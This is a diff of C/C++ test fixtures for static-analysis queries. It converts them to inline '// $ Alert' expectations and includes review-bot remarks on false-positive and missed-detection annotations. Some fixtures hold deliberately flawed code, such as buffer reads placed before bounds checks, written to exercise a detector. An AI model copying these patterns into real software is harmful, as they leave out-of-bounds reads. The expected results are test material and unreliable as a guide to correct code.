@@ -15,7 +15,7 @@ void f1(void) { k(); } -void f2(void) { +void f2(void) { // $ Alert local1(); g(); h(); @@ -45,7 +45,7 @@ void f4(void) { j(); } -void f5(void) { +void f5(void) { // $ Alert MyClass m; m.mg(); diff --git a/cpp/ql/test/query-tests/Architecture/InappropriateIntimacy/InappropriateIntimacy.qlref b/cpp/ql/test/query-tests/Architecture/InappropriateIntimacy/InappropriateIntimacy.qlref index dc7e4d5cd054..18947060c368 100644 --- a/cpp/ql/test/query-tests/Architecture/InappropriateIntimacy/InappropriateIntimacy.qlref +++ b/cpp/ql/test/query-tests/Architecture/InappropriateIntimacy/InappropriateIntimacy.qlref @@ -1 +1 @@ -Architecture/InappropriateIntimacy.ql +query: Architecture/InappropriateIntimacy.ql diff --git a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.cpp b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.cpp index 374ad8b6337b..183cae6b6906 100644 --- a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.cpp +++ b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.cpp @@ -6,12 +6,12 @@ struct aa { TEN(int_f) - TEN(int_g) + TEN(int_g) // $ Alert }; class bb { TEN(int_f) - TEN(int_g) + TEN(int_g) // $ Alert }; union cc_not_flagged_up_because_unions_are_not_classes_in_this_sense { @@ -22,13 +22,13 @@ union cc_not_flagged_up_because_unions_are_not_classes_in_this_sense { template struct dd { TEN(int_f) - TEN(int_g) + TEN(int_g) // $ Alert }; template struct ee { TEN(int_f) - TEN(int_g) + TEN(int_g) // $ Alert }; void instantiate() { @@ -54,10 +54,10 @@ struct MyParticle { unsigned char r2, g2, b2, a2; class texture *tex; - float u1, v1, u2, v2; + float u1, v1, u2, v2; // $ Alert }; -struct MyAlphaClass1 { +struct MyAlphaClass1 { // $ Alert int a1, b1, c1, d1, e1, f1, g1, h1, i1, j1; int k1, l1, m1, n1, o1, p1, q1, r1, s1, t1; int u1, v1, w1, x1, y1, z1; 
@@ -71,7 +71,7 @@ struct MyAlphaClass1 { int u2, v2, w2, x2, y2, z2; }; -struct MyAlphaClass2 { +struct MyAlphaClass2 { // $ Alert int x; // ... diff --git a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.qlref b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.qlref index 1afc89cceef6..6d9540acb23f 100644 --- a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.qlref +++ b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.qlref @@ -1 +1,2 @@ -Architecture/Refactoring Opportunities/ClassesWithManyFields.ql +query: Architecture/Refactoring Opportunities/ClassesWithManyFields.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/different_types.h b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/different_types.h index 3e2a6c6e4ced..11aea5dc11c0 100644 --- a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/different_types.h +++ b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/different_types.h @@ -30,6 +30,6 @@ class DifferentTypes2 { int j6; int j7; int j8; - int j9; + int j9; // $ Alert }; diff --git a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/ComplexFunctions.qlref b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/ComplexFunctions.qlref index 22bc3d276639..a00aeaa47cf4 100644 --- a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/ComplexFunctions.qlref +++ b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/ComplexFunctions.qlref 
@@ -1 +1,2 @@ -Architecture/Refactoring Opportunities/ComplexFunctions.ql +query: Architecture/Refactoring Opportunities/ComplexFunctions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/complex.c b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/complex.c index 6499a1bc38de..be209ddbf459 100644 --- a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/complex.c +++ b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/complex.c @@ -11,7 +11,7 @@ void g(void) { f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); } -void h(void) { +void h(void) { // $ Alert f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); diff --git a/cpp/ql/test/query-tests/Best Practices/GuardedFree/GuardedFree.qlref b/cpp/ql/test/query-tests/Best Practices/GuardedFree/GuardedFree.qlref index d64671f08c33..8abe92507f2a 100644 --- a/cpp/ql/test/query-tests/Best Practices/GuardedFree/GuardedFree.qlref +++ b/cpp/ql/test/query-tests/Best Practices/GuardedFree/GuardedFree.qlref @@ -1 +1,2 @@ -Best Practices/GuardedFree.ql +query: Best Practices/GuardedFree.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/GuardedFree/test.cpp b/cpp/ql/test/query-tests/Best Practices/GuardedFree/test.cpp index d52bcef72d16..04b6cc061d4d 100644 --- a/cpp/ql/test/query-tests/Best Practices/GuardedFree/test.cpp +++ b/cpp/ql/test/query-tests/Best Practices/GuardedFree/test.cpp 
@@ -2,12 +2,12 @@ extern "C" void free(void *ptr); extern "C" int strcmp(const char *s1, const char *s2); void test0(int *x) { - if (x) // BAD + if (x) // BAD // $ Alert free(x); } void test1(int *x) { - if (x) { // BAD + if (x) { // BAD // $ Alert free(x); } } @@ -39,14 +39,14 @@ bool test4(char *x, char *y) { void test5(char *x) { if (x) *x = 42; - if (x) { // BAD + if (x) { // BAD // $ Alert free(x); } } void test6(char *x) { *x = 42; - if (x) { // BAD + if (x) { // BAD // $ Alert free(x); } } @@ -103,7 +103,7 @@ bool test12(char *x) { } void test13(char *x) { - if (x != nullptr) // BAD + if (x != nullptr) // BAD // $ Alert free(x); } diff --git a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/DeclarationHidesParameter.qlref b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/DeclarationHidesParameter.qlref index c3e02ee7f47d..339ba0c68884 100644 --- a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/DeclarationHidesParameter.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/DeclarationHidesParameter.qlref @@ -1 +1,2 @@ -Best Practices/Hiding/DeclarationHidesParameter.ql +query: Best Practices/Hiding/DeclarationHidesParameter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/hiding.cpp b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/hiding.cpp index 0b08a0ae612f..4aa7effb0fb0 100644 --- a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/hiding.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/hiding.cpp @@ -1,7 +1,7 @@ void f(int ii) { if (1) { - for(int ii = 1; ii < 10; ii++) { // local variable hides parameter of the same name + for(int ii = 1; ii < 10; ii++) { // local variable hides parameter of the same name // $ Alert ; } } 
@@ -12,7 +12,7 @@ namespace foo { void f2(int ii, int kk) { try { for (ii = 0; ii < 3; ii++) { - int kk; // local variable hides parameter of the same name + int kk; // local variable hides parameter of the same name // $ Alert } } catch (int ee) { @@ -25,7 +25,7 @@ void myFunction(int a, int b, int c); void myFunction(int a, int b, int _c) { { - int a = a; // local variable hides parameter of the same name + int a = a; // local variable hides parameter of the same name // $ Alert int _b = b; int c = _c; @@ -42,7 +42,7 @@ class MyTemplateClass { template void MyTemplateClass :: myMethod(int a, int b, int _c) { { - int a = a; // local variable hides parameter of the same name + int a = a; // local variable hides parameter of the same name // $ Alert int _b = b; int c = _c; @@ -61,7 +61,7 @@ void test() { void testMacro(int i) { MYMACRO; - for (int i = 0; i < 10; i++) {}; // local variable hides parameter of the same name + for (int i = 0; i < 10; i++) {}; // local variable hides parameter of the same name // $ Alert } #include "hiding.h" @@ -75,7 +75,7 @@ void myClass::myMethod(int arg1, T arg2) { { int protoArg1; T protoArg2; - int arg1; // local variable hides parameter of the same name - T arg2; // local variable hides parameter of the same name + int arg1; // local variable hides parameter of the same name // $ Alert + T arg2; // local variable hides parameter of the same name // $ Alert } } diff --git a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/DeclarationHidesVariable.qlref b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/DeclarationHidesVariable.qlref index 8f9a1799e066..73e5d81ddce2 100644 --- a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/DeclarationHidesVariable.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/DeclarationHidesVariable.qlref 
@@ -1 +1,2 @@ -Best Practices/Hiding/DeclarationHidesVariable.ql +query: Best Practices/Hiding/DeclarationHidesVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/hiding.cpp b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/hiding.cpp index 3a96933db7d2..b75dfbd55307 100644 --- a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/hiding.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesVariable/hiding.cpp @@ -3,7 +3,7 @@ void f(void) { if (1) { int i; - for(int i = 1; i < 10; i++) { // BAD + for(int i = 1; i < 10; i++) { // BAD // $ Alert ; } } @@ -15,7 +15,7 @@ namespace foo { int k; try { for (i = 0; i < 3; i++) { - int k; // BAD + int k; // BAD // $ Alert } } catch (int e) { @@ -35,7 +35,7 @@ void structuredBinding() { int xs[1] = {1}; auto [x] = xs; { - auto [x] = xs; // BAD + auto [x] = xs; // BAD // $ Alert auto [y] = xs; // GOOD } } diff --git a/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/DeclarationHidesVariable.qlref b/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/DeclarationHidesVariable.qlref index 8f9a1799e066..73e5d81ddce2 100644 --- a/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/DeclarationHidesVariable.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/DeclarationHidesVariable.qlref @@ -1 +1,2 @@ -Best Practices/Hiding/DeclarationHidesVariable.ql +query: Best Practices/Hiding/DeclarationHidesVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/Hiding.c b/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/Hiding.c index f055d2fff89c..9f4b900239ae 100644 
--- a/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/Hiding.c +++ b/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/Hiding.c @@ -12,16 +12,16 @@ void f(void) { if(1) { int k; if(1) { - int i; // BAD (hides local) - int j; // BAD (hides local) - int k; // BAD (hides local) + int i; // BAD (hides local) // $ Alert[cpp/declaration-hides-variable] + int j; // BAD (hides local) // $ Alert[cpp/declaration-hides-variable] + int k; // BAD (hides local) // $ Alert[cpp/declaration-hides-variable] int l; int m; int n; - int gi; // BAD (hides global) - int gj; // BAD (hides global) - int gk; // BAD (hides global) + int gi; // BAD (hides global) // $ Alert[cpp/local-variable-hides-global-variable] + int gj; // BAD (hides global) // $ Alert[cpp/local-variable-hides-global-variable] + int gk; // BAD (hides global) // $ Alert[cpp/local-variable-hides-global-variable] } int l; // GOOD (scopes do not overlap) } @@ -34,7 +34,7 @@ int g1, g2, g3, g4, g5; void function1(int g1); // GOOD (the hiding name isn't associated with a code block) extern void function2(int g2); // GOOD (the hiding name isn't associated with a code block) -void function3(int g3) {}; // BAD +void function3(int g3) {}; // BAD // $ Alert[cpp/local-variable-hides-global-variable] void function4(int g4); // GOOD (the hiding name isn't associated with a code block) -void function4(int g5) {}; // BAD +void function4(int g5) {}; // BAD // $ Alert[cpp/local-variable-hides-global-variable] diff --git a/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/LocalVariableHidesGlobalVariable.qlref b/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/LocalVariableHidesGlobalVariable.qlref index 0267b31251d3..326ddde08d3e 100644 --- a/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/LocalVariableHidesGlobalVariable.qlref 
+++ b/cpp/ql/test/query-tests/Best Practices/Hiding/LocalVariableHidesGlobalVariable/LocalVariableHidesGlobalVariable.qlref @@ -1 +1,2 @@ -Best Practices/Hiding/LocalVariableHidesGlobalVariable.ql +query: Best Practices/Hiding/LocalVariableHidesGlobalVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/CommaBeforeMisleadingIndentation.qlref b/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/CommaBeforeMisleadingIndentation.qlref index 02b5f38e358f..97f91b75c951 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/CommaBeforeMisleadingIndentation.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/CommaBeforeMisleadingIndentation.qlref @@ -1 +1,2 @@ -Best Practices/Likely Errors/CommaBeforeMisleadingIndentation.ql +query: Best Practices/Likely Errors/CommaBeforeMisleadingIndentation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/test.cpp b/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/test.cpp index dbf792db3383..49040bf6f480 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/test.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/CommaBeforeMisleadingIndentation/test.cpp @@ -46,10 +46,10 @@ int Foo::test(int (*baz)(int)) if (i) (void)i, // BAD - (void)j; + (void)j; // $ Alert if (1) FOO(i), - (void)x.foo(j); // BAD + (void)x.foo(j); // BAD // $ Alert // Parenthesized comma (borderline example): 
@@ -157,13 +157,13 @@ int Foo::test(int (*baz)(int)) if (i) (void)i, // GOOD if tab >= 4 spaces else BAD -- can't exclude w/o source code text :/ - (void)j; + (void)j; // $ Alert // LHS ends on same line RHS begins on: if (1) foo( i++ - ), j++; // GOOD? [FALSE POSITIVE] + ), j++; // GOOD? [FALSE POSITIVE] // $ Alert if (1) baz( i++ @@ -175,7 +175,7 @@ int Foo::test(int (*baz)(int)) return i++ , i++ // GOOD(?) [FALSE POSITIVE] -- can't exclude w/o source code text :/ ? 1 - : 2; + : 2; // $ Alert int quux = (tata->titi.tutu(), diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/EmptyBlock.qlref b/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/EmptyBlock.qlref index c794984448a1..889bef274a4f 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/EmptyBlock.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/EmptyBlock.qlref @@ -1 +1,2 @@ -Best Practices/Likely Errors/EmptyBlock.ql +query: Best Practices/Likely Errors/EmptyBlock.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/empty_block.cpp b/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/empty_block.cpp index 8a8714d310f4..1c6819e36836 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/empty_block.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/EmptyBlock/empty_block.cpp @@ -6,11 +6,11 @@ void f() { int f(int x) { // BAD: - if (x) {} + if (x) {} // $ Alert // BAD: if (x) { - } + } // $ Alert if (x) { // GOOD (has comment) @@ -18,7 +18,7 @@ int f(int x) { // BAD (comment comes after): if (x) { - } + } // $ Alert // comment // GOOD (exception for loops with block on same line): 
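Review bot: In CommaBeforeMisleadingIndentation/test.cpp, the two results that the fixture itself labels `[FALSE POSITIVE]` are recorded as plain `// $ Alert`, so a known-wrong result reads as an expected one. They are the `), j++;` line in the `@@ -157,13` hunk and the `: 2;` line in the `@@ -175,7` hunk. The inline-expectations format has a marker for this case, so those lines would be better written as `// $ SPURIOUS: Alert`. The same applies to the `GOOD [FALSE POSITIVE]` line in OffsetUseBeforeRangeCheck/test.cpp (`@@ -36,15` hunk). `Foo::test` starts and ends outside both hunks.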
diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/OffsetUseBeforeRangeCheck.qlref b/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/OffsetUseBeforeRangeCheck.qlref index d934901f174f..0e9b8f83382e 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/OffsetUseBeforeRangeCheck.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/OffsetUseBeforeRangeCheck.qlref @@ -1 +1,2 @@ -Best Practices/Likely Errors/OffsetUseBeforeRangeCheck.ql \ No newline at end of file +query: Best Practices/Likely Errors/OffsetUseBeforeRangeCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/test.cpp b/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/test.cpp index 0c7baf7b7ffb..2cf1d8e43c69 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/test.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/OffsetUseBeforeRangeCheck/test.cpp @@ -8,11 +8,11 @@ void test(char *buffer, int bufferSize) while ((i < bufferSize) && (buffer[i] == ' ')) { i++; } // GOOD i = 0; - while ((buffer[i] == ' ') && (i < bufferSize)) { i++; } // BAD + while ((buffer[i] == ' ') && (i < bufferSize)) { i++; } // BAD // $ Alert // check for 'x' if ((i < bufferSize) && (buffer[i] == 'x')) {} // GOOD - if ((buffer[i] == 'x') && (i < bufferSize)) {} // BAD + if ((buffer[i] == 'x') && (i < bufferSize)) {} // BAD // $ Alert if ((bufferSize > i) && (buffer[i] == 'x')) {} // GOOD if ((buffer[i] == 'x') && (bufferSize > i)) {} // BAD [NOT DETECTED] 
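Review bot: The context lines marked `BAD [NOT DETECTED]` in OffsetUseBeforeRangeCheck/test.cpp get no annotation, both in the `@@ -8,11` hunk and again in the `@@ -24,7` hunk. Now that the test is driven by inline expectations, the known misses of this read-before-bounds-check query survive only as free-text comments. Writing them in the shape the commit already uses, `// BAD [NOT DETECTED] // $ MISSING: Alert`, keeps the detection gap in the checked expectations. It should also make the test report a change if the query later starts flagging those lines. `test()` continues outside the hunk.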
@@ -24,7 +24,7 @@ void test(char *buffer, int bufferSize) if ((buffer[i] == 'x') && (bufferSize >= i + 1)) {} // BAD [NOT DETECTED] if ((i < bufferSize) && (true) && (buffer[i] == 'x')) {} // GOOD - if ((buffer[i] == 'x') && (true) && (i < bufferSize)) {} // BAD + if ((buffer[i] == 'x') && (true) && (i < bufferSize)) {} // BAD // $ Alert if ((i < bufferSize - 1) && (buffer[i + 1] == 'x')) {} // GOOD if ((buffer[i + 1] == 'x') && (i < bufferSize - 1)) {} // BAD [NOT DETECTED] @@ -36,15 +36,15 @@ void test(char *buffer, int bufferSize) // look for 'ab' for (i = 0; i < bufferSize; i++) { - if ((buffer[i] == 'a') && (i < bufferSize - 1) && (buffer[i + 1] == 'b')) // GOOD [FALSE POSITIVE] + if ((buffer[i] == 'a') && (i < bufferSize - 1) && (buffer[i + 1] == 'b')) // GOOD [FALSE POSITIVE] // $ Alert break; } if ((i < bufferSize) && (buffer[i])) {} // GOOD - if ((buffer[i]) && (i < bufferSize)) {} // BAD + if ((buffer[i]) && (i < bufferSize)) {} // BAD // $ Alert if ((i < bufferSize) && (buffer[i] + 1 == 'x')) {} // GOOD - if ((buffer[i] + 1 == 'x') && (i < bufferSize)) {} // BAD + if ((buffer[i] + 1 == 'x') && (i < bufferSize)) {} // BAD // $ Alert if ((buffer != 0) && (i < bufferSize)) {} // GOOD } diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/Slicing.qlref b/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/Slicing.qlref index 03280a5c23d9..eb0ac9eff2ea 100644 --- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/Slicing.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/Slicing.qlref @@ -1 +1,2 @@ -Best Practices/Likely Errors/Slicing.ql +query: Best Practices/Likely Errors/Slicing.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/test.cpp b/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/test.cpp index b46c749e70e8..7b28598afee4 100644 
--- a/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/test.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Likely Errors/Slicing/test.cpp @@ -10,7 +10,7 @@ struct Point3 : Point2 { void f() { Point2 p2; Point3 p3; - p2 = p3; + p2 = p3; // $ Alert } void g() { diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/ConstructorOrMethodWithExactDate.cpp b/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/ConstructorOrMethodWithExactDate.cpp index 2720aa8f4035..8c11a811cd63 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/ConstructorOrMethodWithExactDate.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/ConstructorOrMethodWithExactDate.cpp 
@@ -24,20 +24,20 @@ int Main() { // BAD: constructor creating a EraInfo with exact Heisei era start date - EraInfo * pDateTimeUtil = new EraInfo(1989, 1, 8); + EraInfo * pDateTimeUtil = new EraInfo(1989, 1, 8); // $ Alert // BAD: constructor creating a EraInfo with exact Heisei era start date - EraInfo * pDateTimeUtil1 = new EraInfo(1, 2, 1989, 1, 8, L"\u5e73\u6210"); + EraInfo * pDateTimeUtil1 = new EraInfo(1, 2, 1989, 1, 8, L"\u5e73\u6210"); // $ Alert // Good: constructor creating a EraInfo with another date EraInfo * pDateTimeUtil2 = new EraInfo(1, 2, 1900, 1, 1, L"foo"); // BAD: method call passing exact Haisei era start date as parameters - EraInfo * pDateTimeUtil3 = EraInfo::EraInfoFromDate(1, 2, 1989, 1, 8, L"\u5e73\u6210"); + EraInfo * pDateTimeUtil3 = EraInfo::EraInfoFromDate(1, 2, 1989, 1, 8, L"\u5e73\u6210"); // $ Alert // GOOD: method call with the same parameters in a different order (we only track year, month, day) EraInfo * pDateTimeUtil4 = EraInfo::EraInfoFromDate(1, 2, 8, 1, 1989, L"\u5e73\u6210"); // BAD: constructor creating a EraInfo with exact Reiwa era start date - EraInfo * pDateTimeUtil5 = new EraInfo(2019, 5, 1); + EraInfo * pDateTimeUtil5 = new EraInfo(2019, 5, 1); // $ Alert } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/JapaneseEraDate.qlref b/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/JapaneseEraDate.qlref index 4240387a36ce..652bac2ede77 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/JapaneseEraDate.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/JapaneseEraDate.qlref @@ -1 +1,2 @@ -Best Practices/Magic Constants/JapaneseEraDate.ql +query: Best Practices/Magic Constants/JapaneseEraDate.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/StructWithExactDate.cpp b/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/StructWithExactDate.cpp index 7bbf3397ff91..aca98d531851 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/StructWithExactDate.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/Japanese Era/StructWithExactDate.cpp @@ -28,7 +28,7 @@ int main() { // BAD: Creation of tm stuct corresponding to the beginning of Heisei era tm *timeTm = new tm(); - timeTm->tm_year = 1989; + timeTm->tm_year = 1989; // $ Alert timeTm->tm_mon = 1; timeTm->tm_mday = 8; @@ -43,7 +43,7 @@ int main() SYSTEMTIME st; st.wDay = 8; st.wMonth = 1; - st.wYear = 1989; + st.wYear = 1989; // $ Alert // GOOD: Creation of SYSTEMTIME stuct with a different date @@ -57,7 +57,7 @@ int main() SYSTEMTIME st2; st2.wDay = 1; st2.wMonth = 5; - st2.wYear = 2019; + st2.wYear = 2019; // $ Alert return 0; } diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/MagicConstantsNumbers.qlref b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/MagicConstantsNumbers.qlref index 46d0c7be3af2..2e58ec2fd5f8 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/MagicConstantsNumbers.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/MagicConstantsNumbers.qlref @@ -1 +1,2 @@ -Best Practices/Magic Constants/MagicConstantsNumbers.ql +query: Best Practices/Magic Constants/MagicConstantsNumbers.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/a123.c b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/a123.c index f4d259ee5b95..61fc525f5505 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/a123.c 
+++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/a123.c @@ -2,6 +2,6 @@ static void f(void) { int i; - i = 123; + i = 123; // $ Alert } diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/b123.c b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/b123.c index dc4dfd79f8f7..3551b7898d2d 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/b123.c +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/b123.c @@ -1,5 +1,5 @@ static void f(void) { - char str[123]; + char str[123]; // $ Alert } diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/case.c b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/case.c index 73b67768c95a..ad76feb26155 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/case.c +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/case.c @@ -1,7 +1,7 @@ void f(int i) { switch(i) { - case 123 ... 129: + case 123 ... 129: // $ Alert break; } } diff --git a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/constants.h b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/constants.h index 7136026997f2..3026ecf39bf2 100644 --- a/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/constants.h +++ b/cpp/ql/test/query-tests/Best Practices/Magic Constants/MagicConstantsNumbers/constants.h @@ -2,7 +2,7 @@ void FUN(void) { int i, j, k; - i = 123; + i = 123; // $ Alert i = 123; i = 123; i = 123; @@ -57,7 +57,7 @@ void FUN(void) { k = 789; k = 789; - i = 0x0078; + i = 0x0078; // $ Alert i = 0x0078; i = 0x0078; i = 0x0078; @@ -88,7 +88,7 @@ void FUN(void) { i = 0x0078; i = 0x0078; - i = 0x01f8; + i = 0x01f8; // $ Alert i = 0x01f8; i = 0x01f8; i = 0x01f8; 
